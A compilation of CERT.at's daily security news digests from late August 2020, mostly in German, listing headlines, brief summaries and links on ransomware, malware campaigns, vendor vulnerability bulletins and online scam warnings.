https://www.securityweek.com/its-not-just-unusual-login-why-pay-attention-t… ∗∗∗ Cisco warns of actively exploited IOS XR zero-day ∗∗∗ --------------------------------------------- Cisco said it discovered the attacks last week during a support case the companys support team was called in to investigate. --------------------------------------------- https://www.zdnet.com/article/cisco-warns-of-actively-exploited-ios-xr-zero… ∗∗∗ Malware in Spiele-API ∗∗∗ --------------------------------------------- Eine Javascript-Malware auf dem npm-Portal, einem Teil von Github, täuschte vor, eine Schnittstelle zum Partyspiel "Fallguys: Ultimate Knockout" zu sein. --------------------------------------------- https://www.zdnet.de/88382359/malware-in-spiele-api/ ===================== = Vulnerabilities = ===================== ∗∗∗ Critical Slack Bug Allows Access to Private Channels, Conversations ∗∗∗ --------------------------------------------- The RCE bug affects versions below 4.4 of the Slack desktop app. --------------------------------------------- https://threatpost.com/critical-slack-bug-access-private-channels-conversat… ∗∗∗ Cisco IOS XR Software DVMRP Memory Exhaustion Vulnerability ∗∗∗ --------------------------------------------- A vulnerability in the Distance Vector Multicast Routing Protocol (DVMRP) feature of Cisco IOS XR Software could allow an unauthenticated, remote attacker to exhaust process memory of an affected device. The vulnerability is due to insufficient queue management for Internet Group Management Protocol (IGMP) packets. An attacker could exploit this vulnerability by sending crafted IGMP traffic to an affected device. A successful exploit could allow the attacker to cause memory exhaustion, [...] --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ IBM Security Bulletins ∗∗∗ --------------------------------------------- released on 2020-08-28 and 2020-08-29 --------------------------------------------- https://www.ibm.com/blogs/psirt/2020/08/ ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (bind9 and squid), Fedora (libX11 and wireshark), Gentoo (libX11 and redis), Mageia (firefox, libx11, qt4 and qt5base, and x11-server), openSUSE (gettext-runtime, inn, and webkit2gtk3), Oracle (firefox), SUSE (libqt5-qtbase, openvpn, openvpn-openssl1, postgresql10, and targetcli-fb), and Ubuntu (chrony, nss, and squid). --------------------------------------------- https://lwn.net/Articles/829847/ ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (bacula, bind9, freerdp, libvncserver, lilypond, mupdf, ndpi, openexr, php-horde, php-horde-core, php-horde-gollem, php-horde-kronolith, ros-actionlib, thunderbird, and xorg-server), Fedora (golang-github-ulikunitz-xz and qt), Gentoo (bind, chrony, ghostscript-gpl, kleopatra, openjdk, and targetcli-fb), Mageia (ark, evolution-data-server, fossil, kernel, kernel-linus, and thunderbird), openSUSE (apache2, graphviz, grub2, inn, librepo, and [...] --------------------------------------------- https://lwn.net/Articles/830137/ ∗∗∗ Trend Micro Apex One: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- http://www.cert-bund.de/advisoryshort/CB-K20-0854 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 28.08.2020
by Daily end-of-shift report 28 Aug '20

28 Aug '20

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 27-08-2020 18:00 − Freitag 28-08-2020 18:00 Handler: Robert Waldner Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Zahlen ohne PIN – Forscher knacken Visas NFC-Bezahlfunktion ∗∗∗ --------------------------------------------- Kontaktlos und ohne PIN bezahlten Forscher mit einer Visa-Karte quasi beliebig teure Produkte. --------------------------------------------- https://heise.de/-4881555 ∗∗∗ Achtung vor betrügerischen Werbeanzeigen auf Facebook, Instagram und Google! ∗∗∗ --------------------------------------------- Überall lauert Werbung, die uns dazu bringen will, ein bestimmtes Produkt zu kaufen oder eine Dienstleistung in Anspruch zu nehmen. Doch nicht jede Werbung ist seriös. Unter den vielen legitimen Werbetreibenden finden sich auch immer wieder Kriminelle. Das gilt für Soziale Medien genauso wie für Anzeigen, die bei einer Google-Suche ganz oben auftauchen. Wir zeigen Ihnen auf was Sie achten müssen, um unseriöse Werbeanzeigen zu entlarven! --------------------------------------------- https://www.watchlist-internet.at/news/achtung-vor-betruegerischen-werbeanz… ∗∗∗ Stopping Active Directory attacks and other post-exploitation behavior with AMSI and machine learning ∗∗∗ --------------------------------------------- Microsoft Defender ATP leverages AMSI’s visibility into scripts and harnesses the power of machine learning to detect and stop post-exploitation activities that largely rely on scripts. --------------------------------------------- https://www.microsoft.com/security/blog/2020/08/27/stopping-active-director… ∗∗∗ Exploring the Ubiquiti UniFi Cloud Key Gen2 Plus ∗∗∗ --------------------------------------------- Scoping attack surface, setting up debugging for UniFi Protect and UniFi Management Portal APIs, and finding unauthenticated API vulnerabilities --------------------------------------------- https://medium.com/tenable-techblog/exploring-the-ubiquiti-unifi-cloud-key-… ===================== = Vulnerabilities = ===================== ∗∗∗ Multiple NETGEAR switching hubs vulnerable to cross-site request forgery ∗∗∗ --------------------------------------------- GS716Tv2 and GS724Tv3 provided by NETGEAR contain a cross-site request forgery vulnerability. --------------------------------------------- https://jvn.jp/en/jp/JVN29903998/ ∗∗∗ Cisco NX-OS Software Call Home Command Injection Vulnerability ∗∗∗ --------------------------------------------- A vulnerability in the Call Home feature of Cisco NX-OS Software could allow an authenticated, remote attacker to inject arbitrary commands that could be executed with root privileges on the underlying operating system (OS). The vulnerability is due to insufficient input validation of specific Call Home configuration parameters when the software is configured for transport method HTTP. --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ [webapps] Wordpress Plugin Autoptimize 2.7.6 - Arbitrary File Upload (Authenticated) ∗∗∗ --------------------------------------------- https://www.exploit-db.com/exploits/48770 ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Security Guardium ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: IBM Resilient users may experience a denial of service of the SOAR Platform due to a insufficient input validation (CVE-2019-4579) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-resilient-users-may-e… ∗∗∗ Security Bulletin: Information Disclosure vulnerability in IBM Spectrum Protect Server (CVE-2020-4591) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-information-disclosure-vu… ∗∗∗ Security Bulletin: CVE-2020-2654 may affect IBM® SDK, Java™ Technology Edition for Content Collecor for SAP Applications ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-cve-2020-2654-may-affect-… ∗∗∗ Security Bulletin: IBM Resilient users may experience a denial of service of the SOAR Platform due to a insufficient input validation (CVE-2019-4533) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-resilient-users-may-e… ∗∗∗ Security Bulletin: Information disclosure vulnerability in WebSphere Application Server – Liberty affects IBM MobileFirst Platform Foundation ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-information-disclosure-vu… ∗∗∗ Security Bulletin: Vulnerability exposure ( deferred from Oracle Jan 2020 Java CPU ) in IBM Java SDK affects IBM Operations Analytics Predictive Insights ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-exposure-de… ∗∗∗ Security Bulletin: IBM SDK, Java Technology Edition Quarterly CPU – Jul 2020 – Includes Oracle Jul 2020 CPU plus one additional vulnerability affects Content Collecor for SAP Applications ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-sdk-java-technology-e… ∗∗∗ Security Bulletin: Denial of Service vulnerability in IBM Spectrum Protect Server (CVE-2020-4559) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-denial-of-service-vulnera… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 27.08.2020
by Daily end-of-shift report 27 Aug '20

27 Aug '20

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 26-08-2020 18:00 − Donnerstag 27-08-2020 18:00 Handler: Stephan Richter Co-Handler: Thomas Pribitzer ===================== = News = ===================== ∗∗∗ Revamped Qbot Trojan Packs New Punch: Hijacks Email Threads ∗∗∗ --------------------------------------------- New version of trojan is spreading fast and already has claimed 100,000 victims globally, Check Point has discovered. --------------------------------------------- https://threatpost.com/revamped-qbot-trojan-packs-new-punch-hijacks-email-t… ∗∗∗ Security.txt - one small file for an admin, one giant help to a security researcher, (Thu, Aug 27th) ∗∗∗ --------------------------------------------- The draft standard "A File Format to Aid in Security Vulnerability Disclosure" covers the creation of a file called "security.txt" in the /.well-known/ path on a web server, or in its root, which contains information relevant to the security of the server. --------------------------------------------- https://isc.sans.edu/diary/rss/26510 ∗∗∗ Cybercrime: Trickbot droht nun ebenfalls mit Veröffentlichung ∗∗∗ --------------------------------------------- Die mit Emotet verbundene Trickbot-Bande setzt eine neue Ransomware ein und betreibt jetzt auch eine eigene Leak-Plattform. --------------------------------------------- https://heise.de/-4879948 ∗∗∗ Mysteriöse Popup-Meldungen verunsichern Android-Nutzer ∗∗∗ --------------------------------------------- "Test" – das ist der lapidare Inhalt von Push-Nachrichten, die derzeit offenbar in großem Umfang auf Android-Handys auf-poppen. --------------------------------------------- https://heise.de/-4880604 ∗∗∗ Microsoft Warns of New Anubis Info-Stealer Distributed in the Wild ∗∗∗ --------------------------------------------- Microsoft warned on Thursday that a recently uncovered piece of malware designed to help cybercriminals steal information from infected systems is now actively distributed in the wild. --------------------------------------------- https://www.securityweek.com/microsoft-warns-new-anubis-info-stealer-distri… ∗∗∗ Cetus: Cryptojacking Worm Targeting Docker Daemons ∗∗∗ --------------------------------------------- Cetus is a new and improved Docker cryptojacking worm mining for Monero, discovered in a Docker daemon honeypot. --------------------------------------------- https://unit42.paloaltonetworks.com/cetus-cryptojacking-worm/ ===================== = Vulnerabilities = ===================== ∗∗∗ Foxit Studio Photo für Windows: Neue Version gegen Schwachstellen abgesichert ∗∗∗ --------------------------------------------- Version 3.6.6.928 der Bildbearbeitungssoftware Foxit Studio Photo schließt zwei Schwachstellen, deren Ausnutzung eine Nutzerinteraktion erfordert hätte. --------------------------------------------- https://heise.de/-4879609 ∗∗∗ Angreifer könnten F5 BIG-IP Application Security Manager lahmlegen ∗∗∗ --------------------------------------------- F5 hat wichtige Sicherheitsupdates für verschiedene BIG-IP Appliances veröffentlicht. --------------------------------------------- https://heise.de/-4880348 ∗∗∗ Sicherheitsupdates: Cisco sichert Netzwerksoftware NX-OS gegen DoS-Attacken ab ∗∗∗ --------------------------------------------- Aufgrund von mehreren Sicherheitslücken könnten Angreifer verschiedene Switch-Modelle von Cisco attackieren. --------------------------------------------- https://heise.de/-4880654 ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (firefox-esr and nginx), Fedora (firefox, firejail, and lua), Gentoo (chromium, docker, firefox and thunderbird, net-snmp, postgresql, and wireshark), openSUSE (chromium, claws-mail, dovecot23, libreoffice, and python3), Oracle (kernel), Scientific Linux (firefox), SUSE (apache2, graphviz, and libxslt), and Ubuntu (firefox, libmysofa, and squid3). --------------------------------------------- https://lwn.net/Articles/829690/ ∗∗∗ Vulnerabilities Expose Popular DVB-T2 Set-Top Boxes to Botnets: Researchers ∗∗∗ --------------------------------------------- Avast security researchers have identified vulnerabilities in DVB-T2 devices that could allow attackers to ensnare them in botnets. --------------------------------------------- https://www.securityweek.com/vulnerabilities-expose-popular-dvb-t2-set-top-… ∗∗∗ Mozilla Thunderbird: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- https://www.bsi-fuer-buerger.de/SharedDocs/Warnmeldungen/DE/TW/2020/08/warn… ∗∗∗ Security Bulletin: Vulnerability in Netty 4.1.x before 4.1.46 affects IBM Operations Analytics Predictive Insights (CVE-2020-11612) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-netty-4-… ∗∗∗ Security Bulletin: CVE-2020-2654 in IBM® Runtime Environment Java™ affects TXSeries for Multiplatforms ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-cve-2020-2654-in-ibm-runt… ∗∗∗ Security Bulletin: IBM Security Guardium Insights is affected by IBM SDK, Java Technology Edition Quarterly CPU – Apr 2020 vulnerabilities ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-ins… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect ITCAM for SOA ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: WebSphere Application Server ND is vulnerable to cross-site scripting (CVE-2020-4575) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-websphere-application-ser… ∗∗∗ Security Bulletin: IBM Security Guardium Insights is affected by multiple vulnerabilities ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-ins… ∗∗∗ Security Bulletin: Openstack Keystone vulnerabilities affects IBM Spectrum Scale (CVE-2020-12689) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-openstack-keystone-vulner… ∗∗∗ Security Bulletin: A vulnerability in IBM® Java™ Runtime Environment affects IBM CICS TX on Cloud ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-ja… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 26.08.2020
by Daily end-of-shift report 26 Aug '20

26 Aug '20

===================== = End-of-Day report = ===================== Timeframe: Dienstag 25-08-2020 18:00 − Mittwoch 26-08-2020 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ New SunCrypt Ransomware sheds light on Mazes ransomware cartel ∗∗∗ --------------------------------------------- A new ransomware named SunCrypt has joined the Maze cartel, and with their membership, we get insight into how these groups are working together. --------------------------------------------- https://www.bleepingcomputer.com/news/security/new-suncrypt-ransomware-shed… ∗∗∗ Reverse Engineering and observing an IoT botnet ∗∗∗ --------------------------------------------- IoT devices are everywhere around us and some of them are not up to date with todays security standard. A single light bulb exposed to the internet can offer an attacker a variety of possibilities to attack companies or households. The possibilities are endless. --------------------------------------------- https://www.gdatasoftware.com/blog/2020/08/36243-reverse-engineering-and-ob… ∗∗∗ [SANS ISC] Malicious Excel Sheet with a NULL VT Score ∗∗∗ --------------------------------------------- I published the following diary on isc.sans.edu: "Malicious Excel Sheet with a NULL VT Score": Just a quick diary today to demonstrate, once again, that relying only on a classic antivirus solution is not sufficient in 2020. I found a sample that just has a very nice score of 0/57 on VT. --------------------------------------------- https://blog.rootshell.be/2020/08/26/sans-isc-malicious-excel-sheet-with-a-… ∗∗∗ Emulation of Malicious Shellcode With Speakeasy ∗∗∗ --------------------------------------------- In order to enable emulation of malware samples at scale, we have developed the Speakeasy emulation framework. Speakeasy aims to make it as easy as possible for users who are not malware analysts to acquire triage reports in an automated way, as well as enabling reverse engineers to write custom plugins to triage difficult malware families. --------------------------------------------- http://www.fireeye.com/blog/threat-research/2020/08/emulation-of-malicious-… ∗∗∗ Most organizations have no Active Directory cyber disaster recovery plan ∗∗∗ --------------------------------------------- Although 97% of organizations said that Active Directory (AD) is mission-critical, more than half never actually tested their AD cyber disaster recovery process or do not have a plan in place at all, a Semperis survey of over 350 identity-centric security leaders reveals. "The expanded work-from-home environment makes organizational identity a priority and also increases the attack surface relative to Active Directory," said Charles Kolodgy, Principal at Security Mindsets. --------------------------------------------- https://www.helpnetsecurity.com/2020/08/26/active-directory-cyber-disaster-… ∗∗∗ Vorsicht beim privaten Autokauf: Spedition alo-car.com ist Fake! ∗∗∗ --------------------------------------------- Bei der Suche nach günstigen Gebrauchtautos, Wohnmobilen oder Motorrädern, sind Kleinanzeigenplattformen oftmals die beste Option. Doch seien Sie vorsichtig, wenn Ihr Gegenüber sich angeblich im Ausland befindet und den Kauf über eine Spedition abwickeln will. In vielen Fällen handelt es sich dabei um erfundene Speditionen und um Kriminelle, die nur an Ihr Geld wollen. --------------------------------------------- https://www.watchlist-internet.at/news/vorsicht-beim-privaten-autokauf-sped… ∗∗∗ Conti (Ryuk) joins the ranks of ransomware gangs operating data leak sites ∗∗∗ --------------------------------------------- More and more ransomware gangs are now operating sites where they leak sensitive data from victims who refuse to pay the ransom demand. --------------------------------------------- https://www.zdnet.com/article/conti-ryuk-joins-the-ranks-of-ransomware-gang… ∗∗∗ Söldner starten APT-Attacken ∗∗∗ --------------------------------------------- Eine Hackergruppe, die sich als Söldner für verschiedene Auftraggeber verdingt, hat laut Erkenntnissen von Bitdefender Cyber-Spionageangriffe per Advanced-Persistent-Threat-(APT) mit Zero-Day-Attacken auf Autodesk 3ds Max genutzt, um geistiges Eigentum zu stehlen. --------------------------------------------- https://www.zdnet.de/88382317/soeldner-starten-apt-attacken/ ===================== = Vulnerabilities = ===================== ∗∗∗ Magento Multiversion (1.x/2.x) Backdoor ∗∗∗ --------------------------------------------- The Magento 1 EOL date has already passed, however it’s evident that a large number of websites will continue to use it for the foreseeable future. Unfortunately, attackers are also aware that many websites are straggling with their Magento migrations and post compromise tools have been created to support deployment for both Magento 1.x and 2.x versions, making it easier for them to exploit a larger number of sites. --------------------------------------------- https://blog.sucuri.net/2020/08/magento-multiversion-1-x-2-x-backdoor.html ∗∗∗ Extensive file permissions on service executable in Eikon Thomson Reuters (CVE-2019-10679) ∗∗∗ --------------------------------------------- SEC Consult found a vulnerability that allows unprivileged users to escalate their privileges to SYSTEM in Eikon of Thomson Reuters. This is possible due to extensive file permissions that allow standard users to modify executable files. --------------------------------------------- https://sec-consult.com/en/blog/advisories/extensive-file-permissions-on-se… ∗∗∗ Huawei Security Advisories ∗∗∗ --------------------------------------------- Huawei has published 20 new or updated Security Advisories. --------------------------------------------- https://www.huawei.com/en/psirt/all-bulletins ∗∗∗ WordPress: Sicherheitslücken in millionenfach installiertem Plugin Autoptimize ∗∗∗ --------------------------------------------- Nutzer des Plugins Autoptimize sollten dieses zügig auf 2.7.7 updaten. Für eine von zwei geschlossenen Lücken soll demnächst Demo-Code veröffentlicht werden. --------------------------------------------- https://heise.de/-4879463 ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (firefox-esr, ghostscript, php7.0, and proftpd-dfsg), Fedora (mod_http2 and thunderbird), Red Hat (chromium-browser and firefox), and SUSE (apache2, grub2, samba, and xorg-x11-server). --------------------------------------------- https://lwn.net/Articles/829609/ ∗∗∗ F5 BIG-IP: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-0843 ∗∗∗ Security Bulletin: August 2020 : CVE-2020-2654 in IBM Java Runtime affect CICS Transaction Gateway ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-august-2020-cve-2020-2654… ∗∗∗ Security Bulletin: Kerberos vulnerability in IBM Java Runtime affects Collaboration and Deployment Services ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-kerberos-vulnerability-in… ∗∗∗ Security Bulletin: BEAST security vulnerability in IBM Tivoli Netcool Performance Manager for Wireline( CVE-2011-3389) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-beast-security-vulnerabil… ∗∗∗ Security Bulletin: Vulnerability in Apache Batik affects WebSphere Application Server (CVE-2019-17566) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-b… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 25.08.2020
by Daily end-of-shift report 25 Aug '20

25 Aug '20

===================== = End-of-Day report = ===================== Timeframe: Montag 24-08-2020 18:00 − Dienstag 25-08-2020 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ iOS & MacOS: Apple will Sicherheitslücke erst nach einem Jahr schließen ∗∗∗ --------------------------------------------- Eine Lücke im Safari Browser ermöglicht das ungewollte Teilen lokaler Dateien. Apple will die nun veröffentlichte Lücke erst im Frühjahr 2021 schließen. --------------------------------------------- https://www.golem.de/news/ios-macos-apple-will-sicherheitsluecke-erst-nach-… ∗∗∗ Patch Management Policy: A Practical Guide ∗∗∗ --------------------------------------------- Patching – this highly necessary, yet sometimes neglected practice of resolving security issues related to vulnerabilities – can be a burden for organizations of all sizes. You probably already know that a regular and well-defined patch management routine proactively ensures your systems function as they are supposed to. However, it can seem like an overwhelming [...] --------------------------------------------- https://heimdalsecurity.com/blog/patch-management-policy/ ∗∗∗ RATs and Spam: The Node.JS QRAT ∗∗∗ --------------------------------------------- The Qua or Quaverse Remote Access Trojan (QRAT) is a Java-based RAT that can be used to gain complete control over a system. --------------------------------------------- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/rats-and-sp… ∗∗∗ [SANS ISC] Keep An Eye on LOLBins ∗∗∗ --------------------------------------------- I published the following diary on isc.sans.edu: “Keep An Eye on LOLBins“: Don’t misread, I won’t talk about “lolcats” today but “LOLBins” or “Living Off The Land Binaries”. All operating systems provide a rich toolbox to achieve multiple day-to-day tasks like maintenance of the certificates, installation of patches and applications, [...] --------------------------------------------- https://blog.rootshell.be/2020/08/25/sans-isc-keep-an-eye-on-lolbins/ ∗∗∗ Sicherheitsforscher fürchten infiltrierte App-Store-Anwendungen ∗∗∗ --------------------------------------------- Die XCSSET-Malware kommt über Xcode-Projekte auf den Mac. Das könnte Auswirkungen auf Apples Sicherheitskonzept haben. --------------------------------------------- https://heise.de/-4877855 ∗∗∗ Gerade auf Wohnungssuche? Dann sollten Sie sich vor gefälschten Inseraten in Acht nehmen! ∗∗∗ --------------------------------------------- Sie haben endlich Ihre Traumwohnung zu einem unglaublich günstigen Preis gefunden? Es gibt jedoch einen Haken: Der Vermieter ist gerade im Ausland und möchte, dass Sie bereits vor der Besichtigung die Kaution bezahlen? Dann sind Sie auf ein betrügerisches Wohnungsinserat gestoßen! Diese Wohnung existiert in Wahrheit nicht, Kriminelle versuchen mit einem verlockenden Angebot an Ihr Geld und Ihre Ausweiskopien zu kommen! --------------------------------------------- https://www.watchlist-internet.at/news/gerade-auf-wohnungssuche-dann-sollte… ∗∗∗ Browser-based cryptojacking sees sudden spike in activity in Q2 2020 ∗∗∗ --------------------------------------------- However, theres nothing to worry about. Browser-based cryptojacking is not making a comeback. --------------------------------------------- https://www.zdnet.com/article/browser-based-cryptojacking-sees-sudden-spike… ===================== = Vulnerabilities = ===================== ∗∗∗ WordPress: Wichtige Sicherheitsupdates für mehrere Plugins verfügbar ∗∗∗ --------------------------------------------- Updates für "Advanced Access Manager", "Discount Rules for WooCommerce" und "Quiz and Survey Master" schließen Lücken mit hoher bis kritischer Einstufung. --------------------------------------------- https://heise.de/-4878220 ∗∗∗ [20200802] - Core - Open redirect in com_content vote feature ∗∗∗ --------------------------------------------- Project: Joomla! SubProject: CMS Impact: Low Severity: Low Versions: 3.0.0-3.9.20 Exploit type: Open Redirect Reported Date: 2020-July-05 Fixed Date: 2020-August-25 CVE Number: CVE-2020-24598 Description Lack of input validation in com_content leads to an open redirect. Affected Installs Joomla! CMS versions 3.0.0 - 3.9.20 Solution Upgrade to version 3.9.21 Contact The JSST at the Joomla! Security Centre. Reported By: Ahmad Kamaran Jamil --------------------------------------------- https://developer.joomla.org:443/security-centre/825-20200802-core-open-red… ∗∗∗ [20200803] - Core - Directory traversal in com_media ∗∗∗ --------------------------------------------- Project: Joomla! SubProject: CMS Impact: Low Severity: Low Versions: 2.5.0-3.9.20 Exploit type: Directory Traversal Reported Date: 2020-February-02 Fixed Date: 2020-August-25 CVE Number: CVE-2020-24597 Description Lack of input validation allows com_media root paths outside of the webroot. Affected Installs Joomla! CMS versions 2.5.0 - 3.9.20 Solution Upgrade to version 3.9.21 Contact The JSST at the Joomla! Security Centre. Reported By: Hoang Kien from VSEC --------------------------------------------- https://developer.joomla.org:443/security-centre/827-20200803-core-director… ∗∗∗ [20200801] - Core - XSS in mod_latestactions ∗∗∗ --------------------------------------------- Project: Joomla! SubProject: CMS Impact: Moderate Severity: Low Versions: 3.9.0-3.9.20 Exploit type: XSS Reported Date: 2020-August-21 Fixed Date: 2020-August-25 CVE Number: CVE-2020-24599 Description Lack of escaping in mod_latestactions allows XSS attacks. Affected Installs Joomla! CMS versions 3.9.0 - 3.9.20 Solution Upgrade to version 3.9.21 Contact The JSST at the Joomla! Security Centre. Reported By: Peter Martin --------------------------------------------- https://developer.joomla.org:443/security-centre/824-20200801-core-xss-in-m… ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (icingaweb2 and mongodb), Fedora (nss), Gentoo (chromium and shadow), Mageia (ghostscript, kdepim-runtime, kmail-account-wizard, luajit, mysql-connector-python, and python-ipaddress), openSUSE (python, python3, and webkit2gtk3), Red Hat (kernel and kernel-alt), Slackware (firefox), SUSE (squid3), and Ubuntu (bind9, ghostscript, net-snmp, postgresql-10, postgresql-12, postgresql-9.5, and sane-backends). --------------------------------------------- https://lwn.net/Articles/829548/ ∗∗∗ Microsoft Patches Code Execution, Privilege Escalation Flaws in Azure Sphere ∗∗∗ --------------------------------------------- Recently addressed Microsoft Azure Sphere vulnerabilities could lead to the execution of arbitrary code or to elevation of privileges, Cisco Talos’ researchers warn. read more --------------------------------------------- https://www.securityweek.com/microsoft-patches-code-execution-privilege-esc… ∗∗∗ Security Bulletin: IBM Security Guardium is affected by a Missing Security Control vulnerability ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-… ∗∗∗ Security Bulletin: Publicly disclosed vulnerabilities from Kernel affect IBM Netezza Host Management ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner… ∗∗∗ Security Bulletin: Multiple Vulnerabilities in IBM Guardium Data Encryption (GDE) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: IBM Elastic Storage System 3000 is affected by weak crypto algorithm (CVE-2020-4349) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-elastic-storage-syste… ∗∗∗ Security Bulletin: CVE-2020-2654 may affect IBM® SDK, Java™ Technology Edition for Content Collecor for SAP Applications ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-cve-2020-2654-may-affect-… ∗∗∗ Security Bulletin: IBM Elastic Storage Server GUI is affected by cross-site scripting (CVE-2020-4358) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-elastic-storage-serve… ∗∗∗ Security Bulletin: IBM Elastic Storage System 3000 is affected by cross-site scripting (CVE-2020-4358) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-elastic-storage-syste… ∗∗∗ Security Bulletin: WebSphere Application Server is vulnerable for information disclosure that affect IBM CICS TX on Cloud ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-websphere-application-ser… ∗∗∗ Security Bulletin: IBM Elastic Storage System 3000 GUI is affected by verbose error message (CVE-2020-4357) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-elastic-storage-syste… ∗∗∗ Security Bulletin: IBM Elastic Storage System 3000 GUI is affected by weak crypto algorithm (CVE-2020-4379) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-elastic-storage-syste… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 24.08.2020
by Daily end-of-shift report 24 Aug '20

24 Aug '20

===================== = End-of-Day report = ===================== Timeframe: Freitag 21-08-2020 18:00 − Montag 24-08-2020 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Ransomware attackiert VPN und RDP ∗∗∗ --------------------------------------------- Ransomware wird immer gefährlicher. Hacker nutzen vor allem das Remote Desktop Protocol (RDP), und Virtual Private Networks (VPN) als Einfallstore. E-Mail-Phishing verliert dagegen an Bedeutung. --------------------------------------------- https://www.zdnet.de/88382240/ransomware-attackiert-vpn-und-rdp/ ∗∗∗ DarkSide: New targeted ransomware demands million dollar ransoms ∗∗∗ --------------------------------------------- A new ransomware operation named DarkSide began attacking organizations earlier this month with customized attacks that have already earned them million-dollar payouts. --------------------------------------------- https://www.bleepingcomputer.com/news/security/darkside-new-targeted-ransom… ∗∗∗ Lifting the veil on DeathStalker, a mercenary triumvirate ∗∗∗ --------------------------------------------- DeathStalker is a unique threat group that appears to target law firms and companies in the financial sector. They don’t deploy ransomware or steal payment information to resell it, their interest in gathering sensitive business information [...] --------------------------------------------- https://securelist.com/deathstalker-mercenary-triumvirate/98177/ ∗∗∗ Hunting for Risky Rules in Office 365 ∗∗∗ --------------------------------------------- When an attacker compromises an Office 365 mailbox, one of the most common activities that we see is new inbox rules being created - therefore finding these rules is a good way to identify compromised accounts and mailboxes. --------------------------------------------- https://blog.rothe.uk/risky-rules-in-office365/ ∗∗∗ Bypassing MassLogger Anti-Analysis — a Man-in-the-Middle Approach ∗∗∗ --------------------------------------------- The FireEye Front Line Applied Research & Expertise (FLARE) Team attempts to always stay on top of the most current and emerging threats. As a member of the FLARE Reverse Engineer team, I recently received a request to analyze a fairly new credential stealer identified as MassLogger. Despite the lack of novel functionalities and features, this sample employs a sophisticated technique that replaces the Microsoft Intermediate Language (MSIL) at run time to hinder static analysis. --------------------------------------------- 